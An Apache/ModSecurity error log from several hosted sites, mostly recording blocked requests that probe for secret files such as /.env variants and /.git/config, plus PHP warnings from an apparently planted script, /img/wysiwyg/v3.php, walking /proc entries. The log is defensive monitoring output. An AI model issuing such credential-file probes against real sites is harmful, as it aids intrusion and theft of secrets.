[Mon May 11 16:23:23.905701 2026] [security2:error] [pid 1411201:tid 1411262] [client 216.73.216.110:20913] ModSecurity: Warning. Matched phrase "etc/profile" at ARGS:path. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/profile found within ARGS:path: /etc/profile.d"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agHmWvy_GXSWIKeli0vxOgAAAJA"]
[Mon May 11 16:23:24.011428 2026] [security2:error] [pid 1411201:tid 1411262] [client 216.73.216.110:20913] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agHmWvy_GXSWIKeli0vxOgAAAJA"]
[Mon May 11 16:23:24.125746 2026] [security2:error] [pid 1411201:tid 1411262] [client 216.73.216.110:20913] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agHmWvy_GXSWIKeli0vxOgAAAJA"]
PHP Warning:  filesize(): stat failed for /proc/1705065/task/1790186/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705065/task/1790186/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1705065/task/1790186/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705065/task/1790186/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1705065/task/1790186/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705065/task/1790186/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 16:24:06.117314 2026] [authz_core:error] [pid 1411055:tid 1411066] [client 47.128.23.233:48016] AH01630: client denied by server configuration: /home/castigli/public_html/wp-includes/rest-api/search/error_log
PHP Warning:  filesize(): stat failed for /proc/15/task/15/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/15/task/15/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/15/task/15/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/15/task/15/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/15/task/15/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/15/task/15/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 16:25:01.830377 2026] [core:error] [pid 1411099:tid 1411119] [client 18.180.54.2:54138] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:01.925252 2026] [security2:error] [pid 1411099:tid 1411113] [client 43.157.82.252:57178] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "jeanboyault.fr"] [uri "/"] [unique_id "agHmvQ-Qm4vhlWBPlMi5dAAAAA0"]
[Mon May 11 16:25:02.578954 2026] [core:error] [pid 1411099:tid 1411110] [client 18.180.54.2:54164] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:03.109016 2026] [core:error] [pid 1411201:tid 1411265] [client 18.180.54.2:54180] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:03.318366 2026] [core:error] [pid 1412074:tid 1412086] [client 18.180.54.2:54188] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:03.844796 2026] [core:error] [pid 1411055:tid 1411059] [client 18.180.54.2:54192] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:04.013932 2026] [security2:error] [pid 1411099:tid 1411104] [client 18.180.54.2:54202] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/.git/config"] [unique_id "agHmwA-Qm4vhlWBPlMi5dgAAAAM"]
[Mon May 11 16:25:04.014191 2026] [security2:error] [pid 1411099:tid 1411104] [client 18.180.54.2:54202] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/.git/config"] [unique_id "agHmwA-Qm4vhlWBPlMi5dgAAAAM"]
[Mon May 11 16:25:04.014673 2026] [core:error] [pid 1411099:tid 1411104] [client 18.180.54.2:54202] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:04.014823 2026] [security2:error] [pid 1411099:tid 1411104] [client 18.180.54.2:54202] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/.git/config"] [unique_id "agHmwA-Qm4vhlWBPlMi5dgAAAAM"]
[Mon May 11 16:25:04.561093 2026] [core:error] [pid 1416109:tid 1416152] [client 18.180.54.2:54218] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:04.730969 2026] [core:error] [pid 1411055:tid 1411070] [client 18.180.54.2:54220] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:04.780858 2026] [security2:error] [pid 1411099:tid 1411103] [client 43.157.82.252:37260] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "jeanboyault.fr"] [uri "/"] [unique_id "agHmwA-Qm4vhlWBPlMi5dwAAAAI"], referer: http://jeanboyault.fr
[Mon May 11 16:25:05.276402 2026] [security2:error] [pid 1412074:tid 1412077] [client 18.180.54.2:54224] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.git/config"] [unique_id "agHmwTJnyuKVXoStDha0FAAAAEE"]
[Mon May 11 16:25:05.276633 2026] [security2:error] [pid 1412074:tid 1412077] [client 18.180.54.2:54224] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.git/config"] [unique_id "agHmwTJnyuKVXoStDha0FAAAAEE"]
[Mon May 11 16:25:05.277121 2026] [core:error] [pid 1412074:tid 1412077] [client 18.180.54.2:54224] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:05.277284 2026] [security2:error] [pid 1412074:tid 1412077] [client 18.180.54.2:54224] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.git/config"] [unique_id "agHmwTJnyuKVXoStDha0FAAAAEE"]
[Mon May 11 16:25:05.468959 2026] [security2:error] [pid 1411055:tid 1411073] [client 18.180.54.2:54240] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/.env"] [unique_id "agHmwUWKUxpmnkK7zHx7awAAARA"]
[Mon May 11 16:25:05.469206 2026] [security2:error] [pid 1411055:tid 1411073] [client 18.180.54.2:54240] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/.env"] [unique_id "agHmwUWKUxpmnkK7zHx7awAAARA"]
[Mon May 11 16:25:05.469704 2026] [core:error] [pid 1411055:tid 1411073] [client 18.180.54.2:54240] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:05.470080 2026] [security2:error] [pid 1411055:tid 1411073] [client 18.180.54.2:54240] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/.env"] [unique_id "agHmwUWKUxpmnkK7zHx7awAAARA"]
[Mon May 11 16:25:05.974840 2026] [core:error] [pid 1416109:tid 1416129] [client 18.180.54.2:54254] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:06.204582 2026] [security2:error] [pid 1411055:tid 1411074] [client 18.180.54.2:54264] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/.env.local"] [unique_id "agHmwkWKUxpmnkK7zHx7bAAAARE"]
[Mon May 11 16:25:06.204844 2026] [security2:error] [pid 1411055:tid 1411074] [client 18.180.54.2:54264] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/.env.local"] [unique_id "agHmwkWKUxpmnkK7zHx7bAAAARE"]
[Mon May 11 16:25:06.205352 2026] [core:error] [pid 1411055:tid 1411074] [client 18.180.54.2:54264] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:06.205533 2026] [security2:error] [pid 1411055:tid 1411074] [client 18.180.54.2:54264] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/.env.local"] [unique_id "agHmwkWKUxpmnkK7zHx7bAAAARE"]
[Mon May 11 16:25:06.657970 2026] [security2:error] [pid 1411099:tid 1411117] [client 18.180.54.2:54276] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env"] [unique_id "agHmwg-Qm4vhlWBPlMi5eQAAABE"]
[Mon May 11 16:25:06.658229 2026] [security2:error] [pid 1411099:tid 1411117] [client 18.180.54.2:54276] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env"] [unique_id "agHmwg-Qm4vhlWBPlMi5eQAAABE"]
[Mon May 11 16:25:06.658716 2026] [core:error] [pid 1411099:tid 1411117] [client 18.180.54.2:54276] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:06.659314 2026] [security2:error] [pid 1411099:tid 1411117] [client 18.180.54.2:54276] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env"] [unique_id "agHmwg-Qm4vhlWBPlMi5eQAAABE"]
[Mon May 11 16:25:06.900774 2026] [security2:error] [pid 1411201:tid 1411268] [client 18.180.54.2:54286] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/.env.production"] [unique_id "agHmwvy_GXSWIKeli0vxxgAAAJc"]
[Mon May 11 16:25:06.901008 2026] [security2:error] [pid 1411201:tid 1411268] [client 18.180.54.2:54286] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/.env.production"] [unique_id "agHmwvy_GXSWIKeli0vxxgAAAJc"]
[Mon May 11 16:25:06.901527 2026] [core:error] [pid 1411201:tid 1411268] [client 18.180.54.2:54286] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:06.902772 2026] [security2:error] [pid 1411201:tid 1411268] [client 18.180.54.2:54286] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/.env.production"] [unique_id "agHmwvy_GXSWIKeli0vxxgAAAJc"]
[Mon May 11 16:25:07.340348 2026] [security2:error] [pid 1416109:tid 1416132] [client 18.180.54.2:54290] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.local"] [unique_id "agHmw1V4kyjgo4bQBUhTvgAAAMI"]
[Mon May 11 16:25:07.340578 2026] [security2:error] [pid 1416109:tid 1416132] [client 18.180.54.2:54290] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.local"] [unique_id "agHmw1V4kyjgo4bQBUhTvgAAAMI"]
[Mon May 11 16:25:07.341106 2026] [core:error] [pid 1416109:tid 1416132] [client 18.180.54.2:54290] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:07.341734 2026] [security2:error] [pid 1416109:tid 1416132] [client 18.180.54.2:54290] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.local"] [unique_id "agHmw1V4kyjgo4bQBUhTvgAAAMI"]
[Mon May 11 16:25:07.589643 2026] [security2:error] [pid 1411055:tid 1411064] [client 18.180.54.2:54296] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/.env.staging"] [unique_id "agHmw0WKUxpmnkK7zHx7bQAAAQc"]
[Mon May 11 16:25:07.589901 2026] [security2:error] [pid 1411055:tid 1411064] [client 18.180.54.2:54296] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/.env.staging"] [unique_id "agHmw0WKUxpmnkK7zHx7bQAAAQc"]
[Mon May 11 16:25:07.590477 2026] [core:error] [pid 1411055:tid 1411064] [client 18.180.54.2:54296] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:07.590681 2026] [security2:error] [pid 1411055:tid 1411064] [client 18.180.54.2:54296] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/.env.staging"] [unique_id "agHmw0WKUxpmnkK7zHx7bQAAAQc"]
[Mon May 11 16:25:08.062463 2026] [security2:error] [pid 1416109:tid 1416139] [client 18.180.54.2:54306] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.production"] [unique_id "agHmxFV4kyjgo4bQBUhTvwAAAMk"]
[Mon May 11 16:25:08.062713 2026] [security2:error] [pid 1416109:tid 1416139] [client 18.180.54.2:54306] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.production"] [unique_id "agHmxFV4kyjgo4bQBUhTvwAAAMk"]
[Mon May 11 16:25:08.063343 2026] [core:error] [pid 1416109:tid 1416139] [client 18.180.54.2:54306] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
